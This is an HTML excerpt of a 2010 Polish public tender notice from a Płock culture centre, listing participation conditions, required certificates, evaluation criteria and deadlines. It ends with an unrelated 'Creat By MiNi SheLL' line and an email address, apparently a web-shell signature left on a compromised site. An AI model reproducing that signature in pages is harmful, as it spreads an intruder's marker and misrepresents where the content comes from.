<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana w systemie spełnia/nie spełnia na podstawie dokumentów wymienionych w Rozdziale VI SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana w systemie spełnia/nie spełnia na podstawie dokumentów potwierdzających, że wykonawca zrealizował w okresie 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na organizacji imprezy plenerowej - masowej o wartości nie mniejszej niż 500.000,00 zł. brutto
3)	dysponowania odpowiednim</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana w systemie spełnia/nie spełnia na podstawie dokumentów wymienionych w Rozdziale VI SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana w systemie spełnia/nie spełnia na podstawie dokumentów wymienionych w Rozdziale VI SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana w systemie spełnia/nie spełnia na podstawie dokumentów wymienionych w Rozdziale VI SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Scenariusz - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pokis.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Płocki Ośrodek Kultury i Sztuki 09-402 Płock ul. Tumska 9a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2010 godzina 11:00, miejsce: Płocki Ośrodek Kultury i Sztuki 09-402 Płock ul. Tumska 9a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com